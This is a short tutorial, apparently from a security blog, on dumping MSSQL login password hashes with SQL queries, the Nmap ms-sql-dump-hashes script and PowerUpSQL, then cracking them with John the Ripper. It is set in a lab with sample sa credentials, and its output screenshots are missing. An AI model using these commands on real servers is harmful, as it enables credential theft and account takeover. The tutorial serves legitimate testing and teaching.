In this article, we will learn about multiple ways to get hashes of MSSQL users. Every version of MSSQL has different hashes. We have performed our practical on SQL Server 2016 version. Once we find the hashes, we will use JohnTheRipper to crack them.
Table of Content
·
Introduction
to Hashing in SQL server
·
CLI
·
Nmap
·
PowerUpSQL
·
JohnTheRipper
Introduction to Hashing in SQL server
A hash produced in SQL server looks somewhat
like the following:
CLI
To get hashes of all the users, use the
following query:
SELECT * FROM sys.sql_logins
To the hashes of a particular user, use the
following query:
select name,password_hash from sys.sql_logins
where name='sa'
As you can see, both the above queries have
given us the desired result.
Nmap
We can also retrieve the hashes remotely using
Nmap. And the command to do so is the following:
nmap -p1433 --script ms-sql-dump-hashes
--script-args mssql.username=sa,mssql.password=Password@1 192.168.1.146
And as the result of the above command, we have
our hash.
PowerUpSQL
To the hashes remotely, PowerUpSQL provides a
simple command which is as follows:
Import-Module .\PowerUpSQL.ps1
Get-SQLServerPasswordHash -username sa
-Password Password@1 -instance
WIN-P83OS778EQK\SQLEXPRESS -Verbose
These are the multiple ways to retrieve the
hashes for the MSSQL server, both remotely and locally.
JohnTheRipper
Now that we have acquired the hashes, all we
have to do is crack them. For this, we will use the almighty password cracker
tool, i.e., JohnTheRipper. And to de-hash the password hash, use the following
command:
john --format=mssql12 --wordlist=pass hash
And the result shows us that the password is
Password@1 which is accurate. SO, this way, one can dump and then crack the
MSSQL hashes.
0 comments:
Post a Comment